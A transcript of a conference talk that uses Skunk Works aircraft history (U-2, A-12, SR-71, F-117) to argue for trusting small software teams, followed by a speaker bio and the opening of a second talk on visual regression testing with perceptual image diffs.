Johnson himself, is of the actual first flight of the U-2 on August the 4th, just a hair over eight months from when the first metal was cut. A month after the first flight, pilots were breaking altitude records in secret almost daily over the Nevada Desert. By the time they were done flight testing this plane, it had been up to 74,500 feet, well above its operational ceiling, and it had flown over 5,000 miles over 10 hours on a single tank of gas. Now, how'd they do it? Despite the ability to fly three miles higher than any other plane built to that point, the U-2 was a remarkably simple plane. Weight was everything. Every pound cost the plane about a foot of altitude. So they cut weight wherever they could. This is a picture of the internal wing structure of the U-2. It weighs about four pounds per square foot. Most airplane wings weigh about 12 pounds per square foot. So this is a third the weight of a traditional aircraft wing. To me, it looks like a cheap metal awning. There's just not a lot of material there. And of course, this introduced a lack of rigidity in the wing. So the U-2 is known for when it hits turbulence, the wings will flap like a seagull. It scared the pilots to death, but the wings never broke off. The U-2 was also designed with tandem bicycle landing gear. If you look closely at this picture, there's no wheels under the wings.
There's only two sets of wheels under the centerline of the fuselage. The combined weight of this landing gear mechanism is 200 pounds. It's the lightest landing gear that's ever been deployed on a jet aircraft. And it's easier just to show you how this works. So we're riding along in a chase car here behind a U-2. The reason they have the chase cars is because the pilot is in a bulky pressure suit and literally can't see where they are in relation to the ground. So the driver in the chase car is constantly calling out the altitude to them, telling them how close they're getting to the ground. And the plane, you can't land it. It wants to fly so badly, you literally have to stall it into the ground. You have to bring it down to about a foot and then stall it. And then the pilot has to fly it down the runway. He's literally flying the plane, balancing it on two wheels down the runway until he finally bleeds enough speed off to tip the plane over onto its wing. And then they have to put landing gear under the wing so that it can taxi the rest of the way into the hangar. Now look at these guys pulling on the wing on your left here. Look how much this wing is bending as they're pulling, trying to get the other wing off the ground. It's ridiculously flexible. They finally get the Pogo gear under the wings. And this is how it takes off as well. It leaves the hangar with these under the wings and those fall off as it reaches speed and finally lifts off the ground. It's a total hack. And the reason is that every part of the U2 served only one purpose. And the purpose of this plane was to get this payload to 70,000 feet over Russia. This payload, which is currently in the National Air and Space Museum in Washington, is a high resolution camera with 36 inch focal length that could resolve an object that was 2.5 feet across from 70,000 feet. Keep in mind this is the 1950s. This is the highest resolution camera that has ever been built. And because that's what they cared about, they hacked the rest. They could have made the wings more rigid so they didn't flap, but it didn't matter. They could have put different landing gear on it so that it would be easier to land. It didn't matter. This is actually a modern day U2. This plane is still in operation. It still has the same landing gear configuration. The wings are 20 feet wider. It has 30% more payload capability. But they never changed that crazy landing gear configuration because it works. They didn't need to. But they had a problem. The operating assumption that Russian radar couldn't see above 65,000 feet turned out to be incorrect. Almost from the first flight U2 took over Russia, MiGs were chasing at 15 and 20,000 feet below. They were firing missiles at it. Now nothing could get up to its altitude, but the CIA was afraid that they only had 18 months to two years of operational viability out of this plane before Russia figured out a way to shoot it down. And so they needed another answer. They needed the replacement for the U2 almost as soon as they put it into service. And so they designed a plane that would be faster and higher. They wanted a plane that would fly at 100,000 feet and cruise at at least Mach 2, which are crazy numbers. And so in response, Skunkwork started working on the Archangel series of design studies. This is an early model of the Archangel. And by the 11th design revision, it's starting to look a little bit more familiar. Probably think I'm about to tell you about the SR-71, but you're wrong. 
The plane I'm about to tell you about is the Lockheed A-12. This plane is the predecessor to the SR-71. Most people don't know it existed. The technological leap that this plane represents is almost impossible to comprehend. It's designed to fly 5 miles higher than the U2 at 90,000 feet. And it's designed to fly 4 times faster than the U2 at Mach 3.25. Now, the fastest plane America has built to this date is still the F-104 Starfighter. And it can fly at Mach 2 for about a minute, minute and a half before it either runs out of gas or the engine start overheating. This plane was intended to fly at Mach 3.25 for an hour and a half to two hours at a stretch. Now, performing at those extremes meant almost everything the team knew about traditional airplane design didn't apply. And the CIA generously gave them 22 months to figure it out. To coincide with the expected end of operational viability of the U2. Now, aluminum was the material that they would usually build an airplane out of. It's still one of the most common materials for airframes. The problem with aluminum is that it loses its structural integrity at about 300 degrees Fahrenheit. The calculations that they did indicated that this plane would be 800 degrees Fahrenheit at the nose and 1200 degrees Fahrenheit at the engine cowlings. So the aluminum, if they built the plane out of aluminum, the aluminum would literally just fold up. It would have no structural integrity at those temperatures. They considered building it out of stainless because that's the obvious option when you need steel that's going to hold up under high heat, but that would make the plane too heavy to get to the altitudes it needed to get to. And so Henry Combs, the primary structural engineer on the A12 project, suggested they consider titanium. Now he had built the engine exhausts of the F104 out of titanium, and it had worked great. The only problem with building this plane out of titanium is that nobody knew how to build something this big out of titanium. The biggest thing that they had manufactured out of it was engine nozzles. Still, Kelly Johnson was favorable on the proposal. He said any material that can cut our gross weight by half is damn tempting even if it's going to drive us nuts in the process. And he was right about it driving them nuts. They ordered the first batch of titanium in to see what they could do with it, and they realized they had no idea how to extrude it. They had no idea how to weld it. They had no idea how to rivet it. They had no idea how to drill it. The drill bits that they used on aluminum would literally shatter when they tried to drill through titanium with them. On top of that, the U.S. supplier that they ordered these preliminary batches from didn't have enough capacity to supply them in the quantities they needed for the number of airplanes they thought they were going to build. So they asked the CIA for help, and the CIA, through a series of dummy companies and anonymous third parties, set up a supply chain for the leading exporter of titanium of the day, the Soviet Union. So the very metal to build the A-12 came from the same country it was intended to spy on. The extreme operating environment required adaptation everywhere in the plane. Early calculations they did also indicated the plane, when it got up to cruise altitude and cruise temperature, would stretch by two to three inches. It would literally get longer because of how fast it was going. So everything in the plane had to cope with that. 
The control cables were made of Elgiloy, which is the alloy used to make watch springs because it maintains its tensile strength at very high temperatures. The engine nozzles were made of Hastelloy X, which is a nickel alloy, and they chose Hastelloy X because they knew it could withstand the 3,400 degrees Fahrenheit that the afterburners were expected to produce, and it could withstand those temperatures for the hour and a half to two hours that they would be running on afterburner. Off-the-shelf electronics wouldn't function because of the temperature, neither would greases, oils, hydraulic fluids, even fuels. They had to come up with new answers for all of these things because of the operating environment of this plane. They had a custom fuel developed that wouldn't be volatile at the expected range of operating temperatures. The only problem was you couldn't get the stuff to burn. It had such a high flash point that it literally wouldn't ignite. So you had to do this. Inject the engine with triethyl borane, which is really, really nasty stuff that spontaneously combusts with this bright green flash when you expose it to the atmosphere. That was the only way to get this high flash point temperature fuel to ignite. One of the biggest challenges was propulsion, and that's why Kelly Johnson put 32-year-old Ben Rich as the lead propulsion engineer on this plane. Young guy, not a lot of experience, but Kelly Johnson trusted him. This is one of the few places that they actually were able to adapt something off the shelf for this plane. They picked Pratt & Whitney's J58 turbojet engine. Pratt & Whitney had built this engine for a Mach 2 Navy fighter that had been canceled. Pratt & Whitney had about 700 hours of testing on this engine and really wanted to find a place to use it. So they were willing to go to the extremes that Skunk Works needed them to go to to make it work in this plane. They had to modify the engine to make it be able to operate continuously on afterburner and in the thin air at 90,000 feet. But that wasn't the major innovation of the propulsion of this plane. The major innovation is the cone that you see right there. Now that cone actually moves back into the body of the engine by about 26 inches when it gets up to cruise velocity. To understand why, you have to understand how jet engines work. Jet engines work on compression. There's a wide opening at the front of the engine that scoops in as much air as possible and over a series of compressors, it compresses it into a very compact stream that pushes the plane as fast as possible. You can think about what happens when you put your thumb over the nozzle on a garden hose. It's the same effect. So these engine cones, as it got up to Mach 3, would move back into the engine 26 inches. And they were responsible for 70% of the thrust of this engine at cruise velocity. The afterburners contributed another 25%. The engine itself only contributed about 5% of thrust. So this engine essentially converted from standard jet to ramjet in the middle of operating. Air entering this engine at minus 65 degrees at 90,000 feet would be 800 degrees Fahrenheit before it hit the combustion stage of the engine. This is a crazy amount of innovation. But what's just as interesting to me about this plane is the things that Skunk Works chose not to solve. There was no fuel tank sealant that would work over the entire operating range expected of this aircraft. And so this plane would literally sit on the tarmac dripping fuel. You can see the puddle under this plane. 
That's jet fuel. They just didn't care. It didn't matter. Once it got up to supersonic speed, the fuel tanks would seal. It was no big deal. The other interesting thing is the plane can't even start itself. Now, to start these massive jet engines, I already told you about the triethyl borane. But the other thing that you have to do to get the combustion to be self-sustaining is you have to get the turbines spinning at 4500 RPM. You have to do that before you inject the triethyl borane and get the fuel burning. They thought about adding a starter motor to the plane, but it would take a very large starter motor to get the turbine turning as fast as it needed to. So they did this instead. This is the AG-330 start cart, or the Buick, as the ground crews called it. And the reason they called it that is because contained in this start cart are two Buick V8 Wildcat engines. And they would physically couple this thing to the starter shaft of these massive turbines, crank the two V8 engines up to full throttle, get the turbine turning 4500 RPM and light it off. That's a crazy hack. The ground crews said that the hangar literally would sound like a stock car race when they were starting this plane up. But it didn't cost them any altitude. There were only two things that mattered in building the A-12. It needed to go very fast and needed to do so very high. It went five miles higher and four times faster than the U-2. And on April 30, 1962, one year late and 100% over budget, Skunk Works gave the CIA what they wanted. This is a picture of the A-12's first flight. Dripped fuel, couldn't even start the engines without crazy chemicals and a couple of V8 engines. It actually couldn't even take off with a full load of fuel. It had to hit a tanker almost as soon as it took off because those tiny wings wouldn't generate enough lift if you put a full load of fuel in the plane. But it didn't matter. They spent their money and their time on the things that did matter. The titanium construction, the propulsion system, they just hacked their way around the rest. This plane went Mach 3.25 at 90,000 feet and overflew every hostile territory in the world. And it holds the distinction of being the only military aircraft never to have been shot down despite 3,500 missions over some of the most contested territory in the world and having hundreds of missiles launched at it. After building 15 of the A-12 for the CIA, the Air Force requested a two-seater variant with twice as much payload. That plane was the A-12's far more famous younger brother, the SR-71. It holds about every speed and altitude record there is. It holds the record for sustained altitude at 85,069 feet. Now keep in mind these are official records determined over an official course. The plane almost certainly flew higher than this in combat. It holds the record of sustained speed at 2,193.2 miles an hour. It's about Mach 3.3. Now Brian Shul, in his book Sled Driver, tells a bunch of stories about flying this plane, and one of them he tells is outrunning missiles in Libya. Muammar Qaddafi had launched everything in his battery at Brian's plane and he just kept pushing the plane faster and faster and faster because he knew if he could just make it to his turn and get out of the country, he could miss these missiles. Well his reconnaissance officer in the back seat once they made this turn had to remind him to slow the plane back down. When he looked at the speedometer, they were going over Mach 3.5. 
So we know this plane would go well faster than this speed limit. To give you some context on just how fast this is, the muzzle velocity of a .22 caliber rifle bullet is 2,046 miles an hour. So at cruise speed, the SR-71 Blackbird can literally claim to be faster than a speeding bullet. It also set a bunch of speed records over courses. It could fly from New York to London in an hour and 55 minutes. The Concorde on a good day with a heavy tailwind could do it in 2:52. It could fly from Los Angeles to Washington in one hour and four minutes. And over the course of setting that record, it set another one that's one of my favorites because it's really easy to wrap your head around. It flew from St. Louis to Cincinnati in eight minutes and 32 seconds. Now, if you want to drive that in your car, it'll take you about five hours and 16 minutes. It's just an incredibly fast plane, and it's probably going to hold these records forever. With the invention of high-resolution satellite photography and unmanned aerial vehicles, there's really no reason for us to ever build a plane like this again. It's just a crazy amount of innovation, especially when you consider it was built in the 60s. It would be an innovative plane if you built it today. Well, the SR-71 was Kelly Johnson's crowning achievement. In 1975, he hit Lockheed's mandatory retirement age of 65, and he passed the reins on to this man, his protege, Ben Rich. This is the same Ben Rich that had designed the propulsion system for the A-12 at 32 years of age. Now, Ben took over Skunk Works at kind of a tumultuous time. The U.S. appetite for defense spending was at an all-time low after Vietnam. There just wasn't much energy to spend money on new technology. Lockheed had attempted in the wake of this to re-enter the commercial aviation market with this plane, the L-1011 TriStar, and had lost about $2 billion in the process. And keep in mind, these are 1975 dollars. So, Rich had to find significant new work, and he had to find it fast, or he was going to have to let go most of his most expensive and most experienced engineers. Meanwhile, the Cold War continued. Leonid Brezhnev, who had been the Russian premier for most of the Cold War, would be in power for another eight years or so. The Soviet Union had invested around 300 billion rubles in developing radar and surface-to-air missiles like this SA-5 that were far more advanced than any attack capability the Americans had. We couldn't fly against this. To give you some context on this, in the 18-day Yom Kippur War, which was largely a proxy war between the U.S. and Russia, Israel lost 109 U.S.-built aircraft flown by U.S.-trained pilots against these SA-5 missiles that were operated by largely untrained, largely undisciplined Syrian and Egyptian troops. The Soviet technology was so good it didn't even require an experienced operator to be able to shoot down our best technology. And to maintain the mutually assured destruction that had kept the U.S. and Russia from all-out nuclear war throughout the Cold War, the U.S. needed to develop something that could pierce these defenses, but ideas were in short supply. Until Denys Overholser, a 36-year-old math and radar expert on the Skunk Works staff, walked into Ben Rich's office and tossed this document on his desk, the Method of Edge Waves in the Physical Theory of Diffraction. Sounds like a really engaging read, right? 
Well, it was so engaging that it had actually been published by Pyotr Ufimtsev, excuse me, who was the chief scientist at the Moscow Institute of Radio Engineering nearly a decade earlier before the Air Force finally got around to translating it. They just didn't think there was anything of tactical value in here. They hadn't prioritized it. Overholser, however, found something on the last page that seemed very substantial to him. It was a method for calculating the radar cross-section of the edge and the surface of a wing and coming up with an accurate number for just how visible that wing would be on radar. You have to understand that accurately determining how visible a plane would be on radar in these days was largely impossible without building a scale model and sticking it on top of a pole on a radar range, which you can see the A-12 here. Folks like Overholser, who knew something about the science behind radar, could make some educated inferences about what might make a difference to observability, but there were no hard and fast rules, and there was no way to know for certain until you actually tested it. Stealth had long been theorized as something that might be possible, but it was always written off as too difficult, too expensive to try. But in Ufimtsev's document, Overholser was convinced that he had found the formulas that would let them predict observability ahead of time and empirically design for it. So he asked Ben Rich to let him start on some software. Five weeks later, Denys Overholser walked into Ben Rich's office with a sketch of this thing, which the Lockheed technical staff would quickly take to calling the hopeless diamond, because they didn't think they'd ever be able to get it to fly. Now, in the preliminary radar range test that Lockheed did in Palmdale, the radar operator in trying to scope the radar in on this model thought that maybe the model had fallen off of the pole on the test range. And so he asked Ben Rich to stick his head out the window and see if the plane was still on top of the pole. So Ben did that. About the time Ben stuck his head out the door, along comes a crow and lands on the plane. And the radar operator goes, oh, never mind, I've got it now. So you couldn't see the plane, but you could see a crow on the radar. And at that moment, Ben Rich knew they were onto something big. Around this time, DARPA was holding a competition for design of a theoretical stealth aircraft. Lockheed and Northrop won the first phase of the competition. They were given $1.5 million to refine their concepts and build 38-foot models that were then going to be tested at the Air Force's most sensitive and sophisticated radar range in White Sands, New Mexico. That's what you see in this picture, Lockheed's 38-foot model. The only problem was that when they got this out to the radar range to test it, the model was so good that the only thing they could see on the radar was the pole. Now, the Air Force had always assumed that the pole on their radar ranges was invisible. They had never had this problem before. And they didn't know what to do about it. So Denys Overholser went to work, and he made them a better pole, too. And that's what you see here. The pole cost somewhere around $500,000 in and of itself, but it was no longer visible on radar, and they could test the plane. They came up with a really interesting way to test the plane to see just how visible it was on radar. 
They knew that they could take a ball bearing and calculate the theoretical responsiveness of a ball bearing. They knew what a ball bearing should look like on radar. So they decided that they would glue ball bearings to the front of the plane and see how small they could get before they saw the airplane. This is where they started. This is a two-inch ball bearing. They couldn't see the plane. They went smaller and smaller and smaller and smaller until they got to this. That is a one-eighth-inch ball bearing. Most of you probably can't see that. It's smaller than a BB. They still couldn't see the plane. They only saw the ball bearing. So, needless to say, Lockheed won the competition pretty easily. The only thing that was left to be seen is, A, can you get this thing in the air? And B, once you do, is it still stealthy once you add things that the model doesn't have, like engines and air intakes and a pilot? The Air Force wanted two prototype planes in 14 months, and Skunk Works agreed. And 14 months later, they came up with this, the Have Blue. Now, if this thing looks like it might fly to you, it's just because your brain has been conditioned to think that things that look like this are airplanes, because you've seen enough pictures of the stealth fighter over the years. Everybody at Lockheed was still sort of in doubt until they actually saw it in the air. Now, how did they get this thing built in 14 months? Well, not invented here was not a thing at Skunk Works. This thing is literally off of the surplus shelf. It uses the flight control computer from the F-16, navigation from the B-52, the pilot seat from the F-16, the heads-up display from the F-18, engines from a T-2B trainer, and the list goes on and on and on. The only original thing about this plane is the outer skin. The biggest thing that they had to solve, obviously, is aerodynamics. This thing is actually unstable in all three axes of flight. That means that it is pitch unstable, it is yaw unstable, and it's roll unstable. The only plane that they had deployed that was unstable in any axis of flight was the F-16, and it was only pitch unstable. It didn't have to contend with all three. So, they set the flight computer up to determine what inputs they needed to send to the control surfaces to make this thing fly. They would take the pilot's input and sum it with the things that the computer knew that it needed to do, and that would be what went to the control surfaces. The early nickname for this plane was the Wobblin' Goblin, because it took them a while to dial in that software. But true to form, they got it to fly. Most test flights were at night to avoid prying eyes, so this is one of the few pictures we have of this plane in the air. That's why it's such a terrible picture. But now that it could fly, they needed to see if it could live up to the promise of stealthiness. And so they flew it against this, the target acquisition radar from a HAWK missile battery, the most advanced radar technology that the U.S. had at the time. The plane literally overflew this radar right over top. The radar never picked it up. The missiles never swung into alignment. They just pointed lazily at the mountains off in the distance. And they knew that their plane was a success. It's about five years later that the first F-117 stealth fighter detachment was in operation at Tonopah Test Range Airport. Now Tonopah Test Range is the massive military complex in the Nevada desert that encompasses Area 51. 
So there's a pretty good chance that a large number of UFO sightings in the late 80s are this thing. The American public didn't find out about this plane until the first night of Operation Desert Storm. The Air Force sent a total of 22 F-117s into Baghdad that night. And privately, they had calculated that they would lose about 30% of those planes. Because Baghdad at that point was more well defended than even Moscow had been at the height of the Cold War. But they didn't lose any planes that first night. As the pilots were flying out of Baghdad and they reestablished radio contact, they realized that everybody was present and accounted for. They didn't lose a single one of these planes over the entirety of Operation Desert Storm. This whole plane is one big hack. They needed it to be invisible on radar. That's all they needed. And they got there. They got really close. They got it to be as visible as basically a BB by basically not caring about aerodynamics at all. And hacking their way around the laws of physics that govern how planes fly. The computers of the day weren't powerful enough to calculate radar reflectivity of curved surfaces. So that's why this thing is made up of a bunch of angular flat surfaces. It had nothing to do with the design of the plane. They didn't have the computers to design stealthy curved surfaces. So they just built a plane that was all straight surfaces. Kelly Johnson had a long-standing saying that beautiful planes fly beautifully and nobody at Skunk Works thought this was a beautiful plane. But it didn't matter. It didn't matter that it wasn't a beautiful plane. It did exactly what it was designed to do. So how'd they do it? All of these amazing planes, each of which was groundbreaking in some significant way. There's plenty more that we haven't even talked about. Well, our story ends the same place it began. A scrappy team of, at its peak, 23 designers and 105 fabricators created the P-80 around a mocked-up engine in 143 days. And that plane was in service for over 40 years. Not much about Kelly Johnson's philosophy of how to build planes changed over the years, even when he passed the reins on to Ben Rich. He was a proponent of prototyping and learning. I tried to find a picture of Have Blue and the F-117 together on the tarmac. I figured surely it had to be out there. But I started looking at the dates and I realized just how much of a throwaway prototype Have Blue was. They had managed to crash both of them before the F-117 was ever built. He liked to iterate. You can see here the A-12 is on the right and the SR-71 is on the left. The A-12 could go a little faster and a little higher than the SR-71, but it turns out it didn't need to. They revised it to a two-seater with double the payload capacity for the Air Force, gladly trading a bit of altitude and speed for more utility, more mission viability. Kelly also had some general rules about how to run his organization. If you want to know more about those you can Google Kelly's rules and you'll be taken to Kelly Johnson's 14 rules for Lockheed's Skunk Works. But I'm going to tell you about a couple of them that are especially applicable to us as software engineers. The first one is that the number of people having any connection with the project must be restricted in an almost vicious manner. Use a small number of good people, 10 to 25 percent compared to the so-called normal systems. At its peak, there were 75 design engineers working on the SR-71. 
To give you some context for that, Boeing used 10,000 engineers to build the 777, and Boeing had the advantage of computer-assisted design software. Lockheed was still doing all their drawings by hand at that point. Kelly Johnson hired smart people into his organization and he trusted them to do good work. But lots of companies run their software engineering organizations like Henry Ford ran his assembly lines. They measure all of the work the way that Henry Ford measured how many cars were produced, how effective a worker was. They set up all sorts of heavy processes to govern what work gets done and when, and they add a new process for every little hiccup. Now, this process has the desired effect. We turn off our brains and we become factory workers for as long as we can stand the boredom. The things we build, though, have more in common with the planes that Skunk Works built than they do the cars of Henry Ford. We're knowledge workers building unique software, not assembly line workers putting together widgets. How does this work in practice? Well, Peter Drucker, probably the most prolific writer on management in America, tells the story of a young infantry captain in Vietnam. The reporter asked this infantry captain how in the fog of war he maintained command of his troops. And the commander responded, around here, I'm only the guy who's responsible. If these men don't know what to do when they run into an enemy in the jungle, I'm too far away to tell them. My job is to make sure they know what to do. What they do depends on the situation, which only they can judge. The decision lies with whoever is on the spot. This is how software teams work, whether we acknowledge it or not. You're constantly making decisions as you're writing code. Managers can choose to either trust their teams to make good decisions or they can smother them with process and micromanagement and try to have a hand in every decision that their teams make. Good managers hire smart people and trust them to make good decisions as they write code. But they also focus on enabling them to make good decisions by making sure they understand the context and the overall goals of what they're working on. Kelly Johnson handled this by lightening up his systems. A very simple drawing and drawing release system with great flexibility for making changes must be provided. I told you about this earlier on the P-80. He got away from the complex drawing systems that were required elsewhere in Lockheed because his small teams just didn't need them. They didn't need that much process. They were able to get the work done with a much lighter amount of documentation. Now, this lightweight process wouldn't have worked at the Lockheed main plant because they were trying to build a far higher volume of airplanes with far less skilled workers. But Kelly Johnson had a small team and he trusted them. Sarah Mei actually had a really great tweet on this the other day. She said that team pathology is always either hanging onto processes suited to a smaller team or early adopting processes suited to a larger team. It's very true. Ten years ago a friend of mine and I decided to start a boutique software consultancy. So think about the first thing that you would do if you were going to start a boutique software consultancy. It's probably the same thing that we did. We went out and spent a thousand bucks on a Jira license and spent the better part of a week getting it stood up on a VPS so we could track our work. 
Now, keep in mind it was two of us and we had one client at the time. We didn't last very long. You need enough process so that everyone has the context they need but not so much that people turn off their brains and blindly do what they're told. Your process is there to serve you, not the other way around. This is what Kelly Johnson got so right. He couldn't have delivered all this innovation on his own. It wasn't in his brain but the processes he put in place allowed his teams to set the right priorities and make the right compromises at the right point in time when they made decisions. His most important rule was that there should be only one objective: to get a good airplane built on time. What made a good airplane? It delivered the value the customer needed. Hit the key specs and compromise wherever necessary to hit those key specs. He was a pragmatist. Every decision he and his team made was around how to deliver the most value in the shortest amount of time for the customer while bringing out the best in his team. Because of the freedom and the trust that he gave his teams and because of how clearly he laid out the goals for each project, they were able to deliver some of the most amazing planes ever built. The U-2 landed on terrible landing gear. Pilots said it was the easiest thing in the world to fly from 60,000 feet down to six inches. They hated landing it. But the team decided it was worth it to save the weight in favor of the altitude. And the pilots learned to work around it. It was a good compromise. It was a great hack. The SR-71 is the fastest plane ever built but it couldn't even start itself because it didn't have a starter motor. It would have added too much weight. It sat on the tarmac dripping fuel. They just didn't care. The team spent their time figuring out how to build a plane out of titanium. How to make it go Mach 3.25. And they hacked their way around the other stuff. The F-117 violates every law of aerodynamic design. And they worked around it to make it invisible on radar. It bucks conventional wisdom in almost every way possible because of the trust that Ben Rich put in Denys Overholser. Kelly's and later Ben's teams had unprecedented input into what they were building. They had incredible freedom and incredible trust from their bosses. You should push for that freedom in your job if you don't already have it. The process that you follow should be the right size for your team. And you should know the most important things about what you're building. You should know the goals so that you can contribute to your project's success beyond just writing code. If that's not the case for you, push back hard, change it. If you're in a leadership role, you have a responsibility to give that freedom to your team. You need to push as many decisions and as much responsibility down to your team as you can. You need to make sure you're clearly communicating the two or three most important things that your team needs to be building at any given time so that like those frontline soldiers in Vietnam, they can make the right decisions based on what they're seeing and the code they're working on at that instant. You have to give them the context to make those decisions and you have to trust them to make the right decisions. If you do these things, if you trust your team to innovate and don't just trust yourself, if you trust your coworkers to build amazing things, there's no telling what amazing stuff you're going to be able to build together. Thanks a lot. Thank you.
|
Nickolas hails from the Breakfast Taco Capital of the World, Austin, TX. When he's not busy eating said tacos, he's VP of Engineering at Wellmatch Health, working with an incredibly talented team of engineers to bring transparency to healthcare pricing. He believes that software engineering is mostly human interaction and he's passionate about building empathetic, compassionate teams.
|
10.5446/31505 (DOI)
|
This is the continuous visual integration talk. Thank you for being here. We got to go, go, go. We have a lot of things to get through. So just a little bit about me to start. My name is Mike Fotinakis. I'm currently the founder of Percy, Percy.io, which is a tool for visual testing. So I'm really excited to share with you some of the things I've learned over the last year about how to test apps pixel by pixel. I'm also the author of two Ruby gems, JSON API serializers, and Swagger blocks. If you use either of those, I'd love to talk to you after, or if you have any questions. Okay, so let's jump right in. So this will come in like three parts, the problem, the general solution, and kind of how it works, and architectures and methodologies, and all the problems that come along with that. So let's start with the problem. So the problem is basically that unit testing itself is kind of a solved problem. We have a lot of different strategies and techniques and technologies for testing the data of our systems, for the behavior of our systems, for the functionality of our systems, and the integration of our systems with other systems, and end-to-end testing our systems, and smoke testing our deployments. And we have a lot of tools and technologies for this, right? But how do you test something like this? So I guess the color of the text has become the color of the button, or the text now has zero opacity, or something's happened, right? And this was fixed by an issue. Or another example, here's a 404 page of an app I used to work on. This is just what it's supposed to look like. It's pretty simple, pretty straightforward. We launched a feature, and then four weeks later, we were told that our 404 page looked like this. Right? You've all seen this, right? And of course, nobody caught this in QA, because no one QA is the 404 page. And this was a simple change. Somebody had just moved a CSS file, everything else worked, but the 404 page was the one that was broken. So then I got fixed, and then the fix looked like this. So the CTA is totally covered up, and it didn't QA the fix on mobile, so you're still continuing to fix. And then I went and pulled slides for this a while back, and looked at the 404 page, and it was broken again. So I reported this to my old team. So this in the business, this is what we call a regression. And specifically, this is a type of visual regression. So how do product teams fix this today? Shout out the answers. Hire more people? Okay. How do you fix these kinds of problems? What? Interns. Interns? Okay. What are the interns doing? They're clicking around a lot. They're what? They're clicking around a lot. What's that called? Behavioral? Exploring. Exploring? I'm looking for a specific word here. QA. Thank you. QA. So QA is the big one. Right? So, and this can be developer QA. This can be you doing QA on your apps. This can be you have QA engineers. Right? QA can mean many things, but part of the job of this is to find these kinds of things before they hit production. Right? Or, you know, that you get issues from your customers and you fix them after. QA is very necessary, but it's also very slow and manual and complicated. Right? And it's also pretty impossible to catch everything. Right? Even in like a medium-sized app with just tens of models, you can have hundreds of flows and thousands of possible page states and permutations and constant feature churn. Right? 
There's a lot of development that's happening in these apps and you can't catch all of this stuff all the time. So it's also very expensive. Right? So, you know, you're spending manual, human, often engineering hours fixing these kinds of visual regressions. So let's go back to this button problem. And, you know, my standard fix to this would be like, can I write a regression test for this? Right? I'm a big TDD person. I love testing. I write tests for basically everything. So, like, let's go try to write a test for this. Right? So here's like an RSpec feature test that, you know, tests this part of the app. Right? It does simple things. You just click the home page and then it fills in some text box with a title and it clicks a button, right? And then you expect that the page has new content on the page. So there's a problem here, right? Like this test didn't fail. The button still technically works. It's just visually wrong. Right? And this manifests in tons of different ways. So what am I supposed to do here? Am I supposed to assert that some, like, CSS computed style of the color of the thing or maybe that it has a CSS class applied but that's not really testing the right thing? So I'm just not going to do this, right? And no one's going to do this because no one wants to write a test that's this, like, fragile and inflexible, right? Especially in a developing product. So my normal approach is very useless here. So the problem fundamentally is that pixels are changing, right? But we're often only testing what's underneath. We're testing all of our abstractions on top of those pixels. So this is an important problem because the pixels are the things that your users are actually touching and seeing and interacting with all the time. And to go further than that, even with all of our current testing strategies and methodologies, we still lack confidence in deploys, right? You can have a million unit tests for all the different data changes in the world, but if you move a CSS file or change your CSS, you're going to have to go look at it, right? You're going to have to go check that and test it. So let's move on to the solution to this problem. And I don't like to say that this is the solution. I like to frame this as a solution. This is not the be all end all of all testing strategies that will make your life perfect. But it's sort of a new tool in the toolbox. So the question I like framing is, what if we could see every pixel changed in any UI state in every PR that we make, right? So that basically is like, you know, what could we do if we could test our apps pixel by pixel? So in order to do that, I'm going to introduce a new concept you may or may not be familiar with. They're called perceptual diffs. They're called pdiffs. They're called visual diffs. This has been pioneered many times. Brett Slatkin at Google has done quite a bit of work on this on the Google Consumer Surveys team. You should watch his talk. It's about how he accidentally launched a pink dancing pony to production. And then they ended up having to, like, you know, do this style of testing in order to prevent that from happening. So what is a perceptual diff? A perceptual diff is relatively straightforward, right? Given two images, what's the difference between these two images, right? Like compute the delta between these two images. And that can be this, right? 
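[Editor's note: to make "compute the delta between two images" concrete, here is a minimal sketch of a pixel-by-pixel diff in Ruby using the ChunkyPNG gem. This is not how the talk's tools implement it; the file names and the choice of red for changed pixels are just illustrative assumptions, and it assumes both screenshots have the same dimensions.]

```ruby
require "chunky_png"

# Load two same-sized screenshots (hypothetical paths).
old_img = ChunkyPNG::Image.from_file("old.png")
new_img = ChunkyPNG::Image.from_file("new.png")

diff    = ChunkyPNG::Image.new(new_img.width, new_img.height, ChunkyPNG::Color::WHITE)
changed = 0

new_img.height.times do |y|
  new_img.width.times do |x|
    if old_img[x, y] == new_img[x, y]
      diff[x, y] = new_img[x, y]                    # unchanged pixel: copy through
    else
      diff[x, y] = ChunkyPNG::Color.rgb(255, 0, 0)  # changed pixel: mark in red
      changed += 1
    end
  end
end

diff.save("diff.png")
puts "#{changed} pixels changed"
```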
So all the red pixels are the pixels that have changed between these two images without any context about what the image is about, right? So you can compute this basically for any kind of image. So how do we compute these, right? Let's try another example. So shout out the differences in these two side by side. And then we'll show the pdiff and see if you're right. Background color on the top. Lost the link. Capital and thumbnails. Danger buttons gone. Right, you got all of them. So this is the pdiff, right? And you can immediately see all of the changes in that image without having to sort of sift through it, right? All these pixels that have changed, these are the things that have changed on this page. So pdiffs in 30 seconds. Let's go, like, do a pdiff. Pdiffs are pretty straightforward, right? Okay. So I have these two images, just new and old, right? So let's open new and old. Okay. So here are the two images, right? And this is just from the Skeleton, like, demo site. So you can see there's some differences in them, but let's go, like, make a pdiff and see what that actually is. So I have ImageMagick, the library, installed, and I can just use the ImageMagick compare tool and compare old and new, and I'll store the image in diff.png. And I'll have to open diff.png. So cool. We have our first pdiff, right? Those are all the pixels that have changed. And by default, it, you know, overlays the images underneath and makes them translucent, and you can turn those things off. You can pass a bunch of different flags to this command, like a fuzz factor if you don't care that pixels have changed within a certain amount of colors or those kinds of things, right? So computing pdiffs themselves is actually relatively straightforward. So here's a couple of pdiffs in real life, right? So if you try to figure out the difference between these two, it might take you a second, but the difference in this pdiff, you can kind of immediately see that the "do you agree to the terms of use" section of this page is gone, right? It just no longer exists. And I kind of love this because this is a test for an error condition, but it's basically like a back end change manifesting as a front end failure, right? This is a Rails form object that somehow has gotten into a weird state that is manifesting as this sort of front end failure. And you might have a test for this, but this form probably doesn't submit now, right? You probably can't actually submit this form. So here's another example. Here's like a normal visual change, the kind of visual change you might want. Like a new person got added to this page, so the visual diff is, okay, a bunch of things shifted around and got reflowed, and you can sort of go back and forth and be like, okay, I understand that this page has a new thing added to it. So you sort of have to learn how to read pdiffs because they can be a little bit noisy, right? So for example, this one, they look the same, but in the footer, and you probably can't read that, but it says like, if typeof jQuery not equal undefined, slash, you know, something. So this one was somebody added a gem which happens to inject some scripts into the page, and the gem was in a broken state, right? So all of their tests are probably passing, all of everything else is passing, but their footer has some junk in it, right? And you often can't catch these kinds of things without visual tests or, you know, looking at it. 